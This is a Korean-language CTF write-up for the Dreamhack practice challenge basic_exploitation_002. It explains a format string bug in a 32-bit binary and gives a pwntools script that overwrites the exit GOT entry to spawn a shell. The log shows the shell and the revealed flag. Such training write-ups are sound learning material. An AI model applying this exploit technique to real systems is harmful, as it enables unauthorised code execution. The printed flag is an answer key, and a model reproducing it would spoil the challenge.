basic_exploitation_002

Description

이 문제는 서버에서 작동하고 있는 서비스(basic_exploitation_002)의 바이너리와 소스 코드가 주어집니다.
프로그램의 취약점을 찾고 익스플로잇해 셸을 획득한 후, “flag” 파일을 읽으세요.
“flag” 파일의 내용을 워게임 사이트에 인증하면 점수를 획득할 수 있습니다.
플래그의 형식은 DH{…} 입니다.

Files

ubuntu@29c7cfc91700:~/CTF/dreamhack.io/basic_exploitation_002-1$ file ./basic_exploitation_002
./basic_exploitation_002: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4edc3b7b1d4cc47397011a77cabb0b8f7025b52b, not stripped

ubuntu@29c7cfc91700:~/CTF/dreamhack.io/basic_exploitation_002-1$ checksec ./basic_exploitation_002
[*] '/home/ubuntu/CTF/dreamhack.io/basic_exploitation_002-1/basic_exploitation_002'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

분석

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char buf[128]; // [esp+0h] [ebp-80h] BYREF

  initialize();
  read(0, buf, 0x80u);
  printf(buf);
  exit(0);
}

Format String Bug 취약점으로 exit GOT을 덮어써서
EIP 레지스터 값을 컨트롤할 수 있다.

Solution

fsb → %n을 사용하여 함수 주소를 10진수로 변환한 개수로서 생각하기
0x8048609 → 134514185를 서로 반으로 나눠 %hn으로 넣어주기
- 0x0804, 0x8609 나눠서 넣기
- (exit+2) + exit의 got 주소를 서로 반으로 나누기
0x804 – 8 = 2044
0x8609 – 0x804 = 32261

이외에 fmtstr_payload 함수를 사용하여 간단하게 포맷스트링 버그 페이로드를 만들어줄 수도 있다.

from pwn import *

#p = process("./basic_exploitation_002")
p = remote('host3.dreamhack.games', 21748)
e = ELF('./basic_exploitation_002')

exit_got = e.got['exit']
#payload = p32(exit_got+2) + p32(exit_got) + b'%2044c%1$hn%32261c%2$hn'

get_shell = e.symbols['get_shell']
payload = fmtstr_payload(1, {exit_got: get_shell})

p.sendline(payload)

p.interactive()

FLAG

DH{59c4a03eff1e4c10c87ff123fb93d56c}

ubuntu@29c7cfc91700:~/CTF/dreamhack.io/basic_exploitation_002-1$ python3 pwn2.py
[+] Opening connection to host3.dreamhack.games on port 21748: Done
[*] '/home/ubuntu/CTF/dreamhack.io/basic_exploitation_002-1/basic_exploitation_002'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] Switching to interactive mode
       %c                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            8'\xa0\x0$\xa0\x0%\xa0\x0
\xff\xff\xff/$ ls
basic_exploitation_002
flag
$ cat flag
DH{59c4a03eff1e4c10c87ff123fb93d56c}$

basic_exploitation_002

Description

Files

분석

Solution

FLAG

답글 남기기 응답 취소